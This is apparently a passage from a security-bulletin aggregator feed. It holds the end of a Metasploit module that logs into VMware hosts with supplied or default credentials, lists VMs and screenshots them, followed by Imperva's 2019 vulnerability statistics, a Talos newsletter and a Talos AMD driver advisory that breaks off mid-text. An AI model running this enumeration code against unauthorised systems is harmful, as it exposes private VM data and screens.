Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"]}

{"impervablog": [{"lastseen": "2020-01-23T09:35:38", "bulletinFamily": "blog", "description": "As a web application firewall provider, part of our job at Imperva is to continually monitor for new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrating it into a single repository, and assessing each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide an analysis of all web applications and database vulnerabilities throughout the year, view trends, and notice significant changes in the security landscape. As we did last year, we took a look back at 2019 to understand the changes and trends in web application and database security over the past year.\n\nThis year we slightly changed the vulnerability classification algorithm. The goal was to increase classification accuracy as well as to fit the vulnerabilities to the categories defined by OWASP in the best way possible. Such changes directly affected our research, however, and made it hard to compare to the [previous years\u2019](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/>) published results. We, therefore, executed a new algorithm on the data from the previous years and conducted the research back to 2016. In this blog post, all the results from 2019 and previous years are aligned based on the new classification algorithm.\n\nIt may seem to our readers that, when divided into categories, the sum of the vulnerabilities is greater than the total number of vulnerabilities. The reason for this is the assignment of particular vulnerabilities to multiple categories. For example, we came across a SQL injection vulnerability that could allow an attacker to extract sensitive information from a database and execute arbitrary scripts. In such a case the vulnerability would be related to both \u2018Injection\u2019 and \u2018Sensitive Data Exposure\u2019 categories.\n\nWe often face a situation in which one vulnerability can be exploited in different ways and lead to different results. In such cases, we decided to assign this vulnerability to all the categories in which it may manifest. We believe that such an approach will present the overall picture in the most accurate way.\n\nAs in previous years, we continued to see an increase in the amount of vulnerabilities in 2019. The dominant category this year was, by far, injection. When drilling down into the data, a large percentage appeared to be related to Remote Code/Command Execution (RCE). The runner up category was Cross-site scripting (XSS), mainly consisting of Reflected XSS vulnerabilities. We also observed an increase in vulnerabilities in third-party components compared to the previous year, with most of the vulnerabilities related to WordPress plugins. We observed an unexpected decrease in the number of IoT vulnerabilities too, despite the increase in the number of devices in the market.\n\nAs expected, the number of vulnerabilities in API (Application Programming Interface), which is still a growing market, continues to grow, although not as fast as we would have expected based on the previous year. In the content management system category, WordPress was not only the most popular platform but also dominated the number of new vulnerabilities in 2019. In the server-side technologies category, PHP - the most prevalent server-side language - was associated with the highest number of vulnerabilities. MySQL appears to be ahead of all others popular databases, in terms of new vulnerabilities discovered in the last year, with 130 (59%) of the total vulnerabilities. The most common vulnerability in databases was Denial-of-Service (DoS). We drew an interesting conclusion from the social media analysis we conducted on twitter.com. The analysis revealed that the [CVSS score](<https://nvd.nist.gov/vuln-metrics/cvss>), which most of the industry relies on in order to prioritize systems patching, doesn\u2019t necessarily correlate with the vulnerability popularity (at least in social media).\n\n## 2019 vulnerabilities statistics\n\nThe first phase in our yearly analysis was to check the number of vulnerabilities published in 2019 in comparison to previous years. Figure 1 shows the number of vulnerabilities on a monthly basis over the last four years. We can see that the overall number of new vulnerabilities in 2019 (20,362) increased by 17.6% compared to 2018 (17,308) and by 44.5% compared to 2017 (14,086). Dividing vulnerabilities according to the [CVSS](<https://nvd.nist.gov/vuln-metrics/cvss>) (Common Vulnerability Scoring System), 8% were ranked as Low or None severity, 61% were considered Medium, while 18% and 13% were of High and Critical severity respectively. According to our data, almost half of vulnerabilities (47%) have a public exploit available to hackers. In addition, more than a third (40.2%) of vulnerabilities don\u2019t have an available solution, such as a software upgrade, workaround, or software patch.\n\nFigure 1: Number of vulnerabilities\n\n## Vulnerabilities by OWASP category\n\nIn Figure 2, you can see vulnerabilities from 2019 split into OWASP top 10 2017 categories.\n\nFigure 2: Vulnerabilities into OWASP categories\n\n## Most common vulnerability - injection\n\nThe dominant category this year was, by far, injection, with 5,730 (28.1%) of the total vulnerabilities seen in 2019 - a 21% increase on last year. When talking about injection vulnerabilities, the first thing that jumps to mind is SQL injection. When drilling down into the data, however, we saw remote command execution (RCE) emerge as the bigger issue, with 3,869 vulnerabilities (19%), compared to 1,610 vulnerabilities (8%) for SQLi. This was alongside 75 vulnerabilities related to local or remote file inclusion, and 607 vulnerabilities to unsanitized file upload.\n\n## Increase in the number of vulnerabilities in third-party components\n\nWe observed an increase of 80.6% in vulnerabilities in third-party components in 2019 compared to the previous year. These components contain plugins and packages for major products developed by third parties. Out of 2,081 vulnerabilities, 1,341 (64%) were in WordPress plugins, 354 (17%) in Jenkins plugins, while 88 new vulnerabilities were in NodeJS packages and the rest split among different products and frameworks.\n\n## DoS and CSRF\n\nTwo major vulnerability categories - Denial-of-Service (DoS) and Cross-Site-Request-Forgery (CSRF) - were out of the OWASP top 10, but still very common. In 2019 we observed 4,130 new DoS vulnerabilities, a decrease of 19.2% on 2018 with 5114 vulnerabilities. Conversely, the number of CSRF vulnerabilities increased by 23.8% from 639 in 2018 to 791 in 2019.\n\nFigure 3: DoS and CSRF vulnerabilities\n\n## An unexpected decrease in IoT vulnerabilities\n\nDespite the increase in the number of IoT (Internet of Things) devices and vendors, we observed a decrease of 9% in vulnerabilities on the previous year. Figure 4 shows the number of IoT vulnerabilities between 2016-2019.\n\nDiving into categories we found that DoS was the most common vulnerability for IoT in 2019 with 418 vulnerabilities. The runner up was Remote Code/Command Execution with 398 vulnerabilities, and Broken Authentication (default credentials) was in third place with 157 new vulnerabilities in 2019. From here we can conclude that manufacturers had learned from old mistakes and paid more attention to IoT security.\n\nFigure 4: IoT vulnerabilities\n\n## API vulnerabilities - growing, but slowing\n\nAPI (Application Programming Interface) vulnerabilities are becoming more widespread as time goes by. In accordance with this, as presented in Figure 5, the number of new API vulnerabilities in 2019 (485) increased by 18.9% from 2018. Although API vulnerabilities continued to grow year-over-year, they appear to be slowing - from ~80% yearly growth between 2016 to 2018. One possible explanation is that, since APIs are more popular nowadays, they draw more attention from hackers and security researchers. In turn, organizations spend more time securing their APIs.\n\nFigure 5: API vulnerabilities\n\n## Content management systems\n\nThe most popular content management system is WordPress which, according to market share statistics cited by [BuiltWith](<https://trends.builtwith.com/cms>), is used by over 33% of all websites, and by 68% of all websites using a known content management system, followed by Drupal and Joomla. Perhaps unsurprisingly, WordPress also registered the highest number of vulnerabilities (1,574) last year and also saw a major increase of 143% from 2018 (Figure 6). The second major increase in the number of vulnerabilities (77%) was in Magento, from 126 in 2018 to 223 in 2019.\n\nFigure 6: Content Management Systems vulnerabilities\n\nAccording to the [WordPress official site](<https://wordpress.org/plugins/>), the current number of plugins is 55,173, a slight decrease from 55,271 in 2018. Despite this slower growth in new plugins, the number of WordPress vulnerabilities increased. The explanation for this could either be the code quality of the plugins, or the fact that WordPress is such a popular CMS, motivating more attackers to develop dedicated attack tools and try their luck searching for holes in the code.\n\nUnsurprisingly, 97.2% of WordPress vulnerabilities were related to plugins (see Figure 7), which extend the functionality and features of a website or a blog. Anyone can create a plugin and publish it \u2014 WordPress is open-source, easy to manage, and there is no enforcement or proper process that mandates minimum security standards (e.g. code analysis). Hence, WordPress plugins are especially prone to vulnerabilities.\n\nFigure 7: WordPress vulnerabilities\n\nThe number of vulnerabilities in WordPress plugins increased by 143% from 629 in 2018 to 1,530 in 2019. The remaining 44 vulnerabilities were related to WordPress core, which also increased by 159% compared to 2018 where there were only 17 vulnerabilities.\n\nThe most common WordPress vulnerability by far was XSS with 703 (44.6%) vulnerabilities, while the runner up was CSRF with 254 (16.1%) vulnerabilities this year. In 2018, this position was held by Remote Code Execution.\n\nFigure 8: WordPress vulnerabilities into attack type\n\n## Server technologies\n\nPHP is still the most prevalent server-side language used by [37% of the websites](<https://trends.builtwith.com/framework>). Therefore it\u2019s expected to be associated with the highest number of vulnerabilities. In 2019, 2,652 vulnerabilities in server technologies implemented in PHP were published (see Figure 9), an increase of 12.7% on the number of vulnerabilities in 2018 (2,353). Java language, on which many Apache services are written (HTTP-Server, Tomcat, Struts, etc.) had much less attention this year, with 229 new vulnerabilities compared to 256 in 2018. This year also had far fewer (62.5%) vulnerabilities in applications or packages written in JavaScript for NodeJS. These trends can be explained by a continuous increase of awareness of the developers to the application\u2019s security.\n\nFigure 9: Top Server-Side technology vulnerabilities\n\n## Databases\n\n[The three most popular databases](<https://db-engines.com/en/ranking>), with only small gaps between them, were Oracle, MySQL, and Microsoft SQL Server. But, in terms of new vulnerabilities discovered in the last year, MySQL was ahead of all others, with 130 (59%) of the vulnerabilities - this represented an increase of 23.8% on 2018 and 68.8% on 2017. The runner up with regard to the number of new vulnerabilities was SQLite, with 17, followed by Oracle with 16. The popularity of SQLite is growing as it is a lightweight database that\u2019s [integrated](<https://www.sqlite.org/famous.html>) into Android, iOS and Windows 10 as well as being used in many well-known applications like Chrome and Firefox. The most common vulnerability in Databases was Denial-of-Service (DoS) with 138 vulnerabilities, and the runner up was Broken Access Control with 45. This is due to the fact that, in the case of databases, the attacker\u2019s desire is to get access to data. That said, vulnerabilities such as XXE, XSS or CSRF aren\u2019t just applicable to databases.\n\nFigure 10: Vulnerabilities in DataBases\n\n## Social media analysis\n\nAnalyzing tweets from twitter.com, we located the top viral vulnerabilities from 2019. The first place with a wide margin - ~4.5K posts and ~77.5K retweets - belonged to (CVE-2019-0708), a remote code execution vulnerability in Remote Desktop Services for Windows (a.k.a BlueKeep). That was disclosed on May 16 and had a public exploit from September 6. According to [StatCounter Global Stats reports](<https://gs.statcounter.com/os-market-share/desktop/worldwide>) from December 2019, Windows is the most popular desktop computer operating system with more than 77% market share, which might explain the hype around this vulnerability.\n\nThe runner up, with 670 posts and 18.7K retweets, was (CVE-2019-14287) - a bypass of `runas` user restrictions in UNIX sudo shell command. By exploiting this vulnerability, users with low privileges can run processes as a root user. The third place, with 339 posts and ~15K retweets, belonged to (CVE-2019-11932), a remote code execution in WhatsApp Messenger for Android in which the android-gif-drawable library is used to parse a specially crafted GIF image. According to [Statista](<https://www.statista.com/statistics/258749/most-popular-global-mobile-messenger-apps/>), WhatsApp appears to be a market leader in its sector with 1.6 billion active users.\n\nThe most viral vulnerability in web application technologies, with 553 unique posts and ~8.5K retweets, was (CVE-2019-11043), a [remote code execution vulnerability in PHP-FPM](<https://www.imperva.com/blog/tracking-cve-2019-11043-php-vulnerability/>) running on the Nginx server. It wasn\u2019t surprising that the RCE vulnerability in the most popular server-side technology would be highlighted accordingly in social media. Between the exploit\u2019s release on October 22 and the end of the year, we observed more than 730,000 attempted attacks on Imperva\u2019s Cloud WAF customers.\n\n**CVE ID** | **DESCRIPTION** | **CVSS SCORE** | **DATE PUBLISHED** \n---|---|---|--- \nCVE-2019-0708 | Microsoft Windows Remote Desktop Services RDP Connection Request Handling Remote Code Execution | 10 | 16/05/2019 \nCVE-2019-14287 | Sudo Runas Specification ALL Keyword Local Command Execution | 8.8 | 14/10/2019 \nCVE-2019-11932 | WhatsApp Messenger for Android GIF Image Handling Function Arbitrary Code Execution | 8.8 | 02/10/2019 \nCVE-2019-1040 | Microsoft Windows MitM NTLM MIC Protection Bypass | 5.9 | 12/06/2019 \nCVE-2019-11043 | Remote Code Execution Vulnerability In PHP-FPM (The Fastcgi Process Manager) Running On The Nginx Server | 9.8 | 28/10/2019 \nCVE-2019-11931 | WhatsApp MP4 File Elementary Stream Metadata Handling Remote Stack Buffer Overflow | 7.8 | 14/11/2019 \nCVE-2019-2215 | Linux Kernel Binder (The Main Inter-Process Communication System In Android) Use-after-free Local Privilege Escalation | 7.8 | 11/10/2019 \nCVE-2019-8777 | Apple macOS FaceTime Lock Screen Handling Unspecified Local Contact Information Disclosure | 1.2 | 10/10/2019 \nCVE-2019-11510 | Pulse Connect Secure Web Service HTML5 Access Feature Path Traversal Remote File Disclosure | 10 | 26/04/2019 \nCVE-2019-2107 | Google Android Media Framework Unspecified File Handling Arbitrary Code Execution | 8.8 | 01/07/2019 \n \nThe interesting conclusion we drew from the analysis of these tweets was that the [CVSS score](<https://nvd.nist.gov/vuln-metrics/cvss>) that most of the industry relies on to prioritize systems patching doesn\u2019t necessarily correlate with the vulnerability popularity (at least in social media). While 95% of vulnerabilities are mentioned in fewer than 40 tweets, there are some \u201csuperstars\u201d that feature in thousands of posts and reposts. In Figure 12 you can see the distribution of vulnerabilities by CVSS score and their virality in social media. While it\u2019s not hard to notice a trend for more viral vulnerabilities among high CVSS scores, there are dozens of vulnerabilities in the Medium severity range that also reached high popularity in social media.\n\nFigure 12: CVSS by Social Media Virality\n\n## Predictions for 2020\n\nAs a security vendor, we\u2019re often asked for our thoughts on what the future might hold. Here, then, are our vulnerability predictions for 2020:\n\n * Old faithful Injection and Cross-Site-Scripting vulnerabilities will remain at the top of the chart. Despite the awareness of these vulnerabilities and the number of tools that check code for their presence, their number won\u2019t decrease in 2020. The reason for this is the direct impact of the exploitation of these vulnerabilities, as well as - in most cases - the lack of preconditions required to exploit them.\n * The number of vulnerabilities in third-parties will continue to grow. Major platforms and frameworks rely on third-party plugins. WordPress has over [55K plugins](<https://wordpress.org/plugins/>), the NPM registry has almost [450K packages](<https://skimdb.npmjs.com/registry>) for NodeJS, and PyPI has over [210K packages](<https://pypi.org/>) for Python. In addition, there are also main package registries for [Java](<https://maven.apache.org/>) and [Ruby](<https://rubygems.org/>)-based projects. As the community continues to grow, and without code standards or restrictions to publish a plugin or a package, they remain the weakest point in the application, making them the sweet spot for attackers.\n * The release of the [OWASP top 10 for API](<https://www.owasp.org/index.php/OWASP_API_Security_Project>) that standardizes the main threats in API will, on one hand, increase the awareness of security among developers. On the other hand, however, it will focus attackers and increase their attention on API vulnerabilities. Based on the previous year\u2019s results, we expect to see constant growth, but at the same time a decrease in the growth rate.\n * The security awareness among IoT vendors is still growing, so they will invest more in securing their devices. This will be reflected in the number of new vulnerabilities in IoT devices.\n\n## How to protect your apps and data\n\nOne of the best solutions for protecting against web application and database vulnerabilities is to deploy a [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and Data Monitoring &amp; Protection. The solutions may be either on-premise, in the cloud, or a combination of both depending on your needs, infrastructure, and more. As organizations move more of their apps and data to the cloud, it\u2019s important to think through your security requirements. A solution supported by a dedicated security team is one to add to your selection criteria. Security teams can push timely security updates in order to properly defend your assets.\n\nThe post [The State of Vulnerabilities in 2019](<https://www.imperva.com/blog/the-state-of-vulnerabilities-in-2019/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2020-01-23T08:56:58", "published": "2020-01-23T08:56:58", "id": "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "href": "https://www.imperva.com/blog/the-state-of-vulnerabilities-in-2019/", "type": "impervablog", "title": "The State of Vulnerabilities in 2019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2020-01-23T17:32:42", "bulletinFamily": "blog", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nThis wasn\u2019t your average Patch Tuesday. Microsoft\u2019s monthly security update was notable for a few reasons. For starters, it\u2019s really time to give up Windows 7, since this is the last free update Microsoft will issue for the operating system. \n \nThere was also a vulnerability that made headlines for leaving Windows open to cryptographic spoofing, which could allow an attacker to sign a malicious file as if it came from a trusted source. The bug was so severe that Microsoft even reached out to the U.S. military ahead of time to issue them an early patch. For more on Patch Tuesday, you can check out our roundup [here](<https://blog.talosintelligence.com/2020/01/microsoft-patch-tuesday-jan-2020.html>) and our Snort rule release [here](<https://blog.snort.org/2020/01/snort-rule-update-for-jan-14-2020.html>). \n \nElsewhere in the vulnerability department, we also released new Snort rules to [protect users against some notable Citrix bugs](<https://blog.talosintelligence.com/2020/01/snort-rules-cve-2019-19781.html>) that have been used in the wild. \n \nAnd, as always, we have the [latest Threat Roundup](<https://blog.talosintelligence.com/2020/01/threat-roundup-0103-0110.html>) where we go through the top threats we saw \u2014 and blocked \u2014 over the past week. \n\n\n### Upcoming public engagements\n\n**Event: **Talos Insights: The State of Cyber Security at Cisco Live Barcelona \n**Location: **Fira Barcelona, Barcelona, Spain \n**Date:** Jan. 27 - 31 \n**Speakers: **Warren Mercer \n**Synopsis: **Cisco Talos specializes in early-warning intelligence and threat analysis necessary for maintaining a secure network. We are responsible for defending networks realize that the security threat landscape is constantly in flux as attackers evolve their skills. Talos advances the overall efficacy of all Cisco security platforms by aggregating data, cooperating with teams of security experts, and applying the cutting-edge big data technology to security. In this talk, we will perform a deep analysis of recent threats and see how Talos leverages large datasets to deliver product improvements and mitigation strategies. \n \n\n\n### Cyber Security Week in Review\n\n * Apple once again [denied the FBI\u2019s request](<https://threatpost.com/apple-denies-fbi-request-to-unlock-shooters-iphone-again/151797/>) for the company to unlock an iPhone belonging to someone involved in a criminal investigation. The agency is attempting to access a device belonging to a man who shot and killed multiple people at a naval base last year. \n * This caused U.S. President Donald Trump to enter the fold. [Trump tweeted](<https://www.bbc.com/news/business-51115645>) that he was unhappy with Apple denying law enforcement access to devices \"used by killers, drug dealers and other violent criminal elements.\u201d \n * More than two weeks after a ransomware attack, foreign currency exchange service Travelex is [finally resuming normal operations](<https://www.zdnet.com/article/two-weeks-after-ransomware-attack-travelex-says-some-systems-are-now-back-online/>). The company recently said it was making \u201cgood progress\u201d on recovery and was expecting customer-facing systems to return soon. \n * The Travelex attack [prompted the U.S. government to release a new warning](<https://www.forbes.com/sites/daveywinder/2020/01/13/us-government-critical-security-alert-upgrade-vpn-or-expect-continued-cyber-attacks/#182cb2f16f70>) that users need to update their VPN services as soon as possible. Vulnerabilities disclosed last year in Pulse Secure VPN leave users open to cyber attacks similar to the ransomware infection on Travelex, according to the U.S. Cybersecurity and Infrastructure Security Agency. \n * The Democratic party in Iowa says it will still use a mobile app to [report primary election results](<https://www.npr.org/2020/01/14/795906732/despite-election-security-fears-iowa-caucuses-will-use-new-smartphone-app>), despite warnings that it is a security risk. Election judges will use the apps to count polling results during the presidential primaries and report those results on their mobile devices, though officials say there will be paper backups to verify the results. \n * The estimated cost of a recent cyber attack on the city of New Orleans is [above $7 million](<https://www.fox8live.com/2020/01/15/city-new-orleans-says-it-will-take-months-recover-recent-cyber-attack/>), $3 million of which the city says it will recoup from its cyber insurance policy. Officials say it will still take months to rebuild their internal network, and departments are still digging out from having to manually carry out many functions for weeks. \n * The U.S. election security czar warned that attempts to interfere in the U.S.\u2019 upcoming presidential election will be [more sophisticated than ever](<https://www.nbcnews.com/politics/national-security/u-s-election-czar-says-attempts-hack-2020-election-will-n1115346>). Shelby Pierson said at a recent presentation America is tracking several hacking groups, including a recent effort uncovered to breach a Ukrainian company at the center of President Donald Trump\u2019s impeachment trial. \n * A critical [vulnerability in a popular WordPress plugin](<https://www.bleepingcomputer.com/news/security/critical-wordpress-plugin-bug-allows-admin-logins-without-password/>) leaves more than 300,000 sites open to attack. An attacker could exploit a bug in InfiniteWP to log in as an administrator on any affected site. \n * Android devices infected with the Faketoken malware began [sending offensive SMS messages](<https://www.kaspersky.com/blog/faketoken-trojan-sends-offensive-sms/32048/>) last week. It sends these messages to foreign numbers, potentially costing the victim money based on their carrier\u2019s policies. \n * The U.S. may invest more than $1 billion into [researching alternatives for 5G](<https://arstechnica.com/tech-policy/2020/01/us-may-subsidize-huawei-alternatives-with-proposed-1-25-billion-fund/>) to avoid working with Chinese tech companies Huawei and ZTE. Legislation submitted in the Senate urged America to counter the Chinese government\u2019s investment in the telecom space.\n\n### Notable recent security issues\n\n**Title: **[Microsoft patches 49 vulnerabilities as part of Patch Tuesday](<https://www.pcworld.com/article/3514172/microsoft-nsa-confirm-killer-windows-10-bug-but-a-patch-is-available.html>) \n**Description: **Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. Patch Tuesday covers 49 vulnerabilities, eight of which are considered critical. This month's security update is particularly important for its disclosure of two vulnerabilities related to a core cryptographic component in all versions of Windows. CVE-2020-0601 could allow an attacker to use cryptography to sign a malicious executable, making the file appear as if it was from a trusted source. The victim would have no way of knowing if the file was malicious. Cyber security reporter Brian Krebs says the vulnerability is so serious, Microsoft secretly deployed a patch to branches of the U.S. military prior to today. \n**Snort SIDs: **52593 - 51596, 52604, 52605 \n \n**Title: **[ZeroCleare wiper malware deployed on oil refinery ](<https://www.zdnet.com/article/new-iranian-data-wiper-malware-hits-bapco-bahrains-national-oil-company/>) \n**Description: **ZeroCleare, a wiper malware connected to an Iranian hacker group, was recently deployed against a national oil refinery in Bahrain. An upgraded version has been spotted in the wild, according to security researchers, which can delete files off infected machines. The latest attacks match previous attacks using this malware family, which have gone after other targets connected to Saudi Arabia. Concerns over Iranian cyber attacks have spiked since the U.S. killed a high-profile Iranian general in a drone strike. \n**Snort SIDs: **52572 \u2013 52581 \n\n\n### Most prevalent malware files this week\n\n**SHA 256: **[1c3ed460a7f78a43bab0ae575056d00c629f35cf7e72443b4e874ede0f305871](<https://www.virustotal.com/gui/file/1c3ed460a7f78a43bab0ae575056d00c629f35cf7e72443b4e874ede0f305871/details>) \n**MD5: **c2406fc0fce67ae79e625013325e2a68 \n**Typical Filename: **SegurazoIC.exe \n**Claimed Product: **Digital Communications Inc. \n**Detection Name: **PUA.Win.Adware.Ursu::95.sbx.tg \n** \n****SHA 256: **[d73ea76f6f07f96b337335213418b58e3fbc7e4b519fec0ef3fbd19c1d335d81](<https://www.virustotal.com/gui/file/d73ea76f6f07f96b337335213418b58e3fbc7e4b519fec0ef3fbd19c1d335d81/details>)** ** \n**MD5: **5142c721e7182065b299951a54d4fe80 \n**Typical Filename: **FlashHelperServices.exe \n**Claimed Product: **Flash Helper Service \n**Detection Name: **PUA.Win.Adware.Flashserv::1201 \n \n**SHA 256:** [c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/gui/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>)** ** \n**MD5: **e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f.bin** ** \n**Claimed Product: **N/A \n**Detection Name: **W32.AgentWDCR:Gen.21gn.1201 \n** \n****SHA 256: **[15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b](<https://www.virustotal.com/gui/file/15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b/details>) \n**MD5: **799b30f47060ca05d80ece53866e01cc \n**Typical Filename: **mf2016341595.exe \n**Claimed Product: **N/A \n**Detection Name: **W32.Generic:Gen.22fz.1201 \n** \n****SHA 256: **[da231330efd623bc7d116ed233828be88951b9df7cc889e747d31279bdf2c2a0 ](<https://www.virustotal.com/gui/file/da231330efd623bc7d116ed233828be88951b9df7cc889e747d31279bdf2c2a0/details>) \n**MD5: **4a4ee4ce27fa4525be327967b8969e13 \n**Typical Filename: **4a4ee4ce27fa4525be327967b8969e13.exe \n**Claimed Product:** N/A \n**Detection Name: **PUA.Win.File.Coinminer::tpd \n \nKeep up with all things Talos by following us on [Twitter](<https://twitter.com/talossecurity?lang=en>). [Snort](<https://twitter.com/snort?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), [ClamAV](<https://twitter.com/clamav?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) and [Immunet](<https://twitter.com/immunet?lang=en>) also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast [here](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>) (as well as on your favorite podcast app). And, if you\u2019re not already, you can also subscribe to the weekly Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>). \n\n", "modified": "2020-01-23T07:27:43", "published": "2020-01-23T07:27:43", "id": "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/2OjR0NsavV0/threat-source-newsletter-jan-26-2019.html", "type": "talosblog", "title": "Threat Source newsletter (Jan. 16, 2019)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-22T15:59:41", "bulletinFamily": "blog", "description": "[](<https://1.bp.blogspot.com/-4KmzPgCzEnI/XUgv9m3AF_I/AAAAAAAAAC4/C28-47fWukERV4yT0uQnA2_xuy2aB8ZkgCPcBGAYYCw/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg>)\n\n \n_[Piotr Bania](<https://twitter.com/piotrbania?lang=en>) of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw._ \n \nMultiple vulnerabilities exist in a driver associated with the AMD Radeon line of graphics cards. An attacker can exploit these bugs by providing a specially crafted shader file to the user while using \n\n\n[](<https://1.bp.blogspot.com/-JXkSIehaKi4/XUgwEX6wLjI/AAAAAAAAAC8/8mea4rZfy7AGT_PIchejkERmCFmfdbxTACPcBGAYYCw/s1600/patch_availability_available.jpg>)\n\nVMware Workstation 15. These attacks can be triggered from VMware guest usermode to cause a variety of errors, potentially allowing an attacker to cause a denial-of-service condition or gain the ability to remotely execute code. \n \nIn accordance with our coordinated disclosure policy, Cisco Talos worked with AMD and VMware to ensure that these issues are resolved and that [an update](<https://drivers.amd.com/drivers/beta/win10-radeon-software-adrenalin-2020-edition-20.1.1-jan9.exe>) is available for affected customers. \n \n \n \n\n\n### Vulnerability details\n\n**AMD ATI Radeon ATIDXX64.DLL shader functionality constant buffer denial-of-service vulnerability (TALOS-2019-0913/CVE-2019-5124)** \n \n \nAn exploitable out-of-bounds read vulnerability exists in AMD ATIDXX64.DLL driver, version 26.20.13001.50005. A specially crafted pixel shader can cause a denial of service. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host. \n \nRead the complete vulnerability advisory [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0913>) for additional information. \n** \n****AMD ATI Radeon ATIDXX64.DLL MOVC shader functionality denial-of-service vulnerability (TALOS-2019-0936/CVE-2019-5147)** \n \nAn exploitable out-of-bounds read vulnerability exists in AMD ATIDXX64.DLL driver, version 26.20.13003.1007. A specially crafted pixel shader can cause a denial of service. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host. \n \nRead the complete vulnerability advisory [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0936>) for additional information. \n \n**AMD ATI Radeon ATIDXX64.DLL MAD shader functionality denial-of-service vulnerability (TALOS-2019-0937/CVE-2019-5146)** \n \nAn exploitable out-of-bounds read vulnerability exists in AMD ATIDXX64.DLL driver, version 26.20.13025.10004. A specially crafted pixel shader can cause a denial of service. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host. \n \nRead the complete vulnerability advisory [here](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0937>) for additional information. \n \n**AMD ATI Radeon ATIDXX64.DLL shader functionality VTABLE remote code execution vulnerability (TALOS-2019-0964/CVE-2019-5183)** \n \nAn exploitable type confusion vulnerability exists in AMD ATIDXX64.DLL driver, versions 26.20.13031.10003, 26.20.13031.15006 and 26.20.13031.18002. A specially crafted pixel shader can cause a type confusion issue, leading to potential code execution. An attacker can provide a specially crafted shader file to trigger 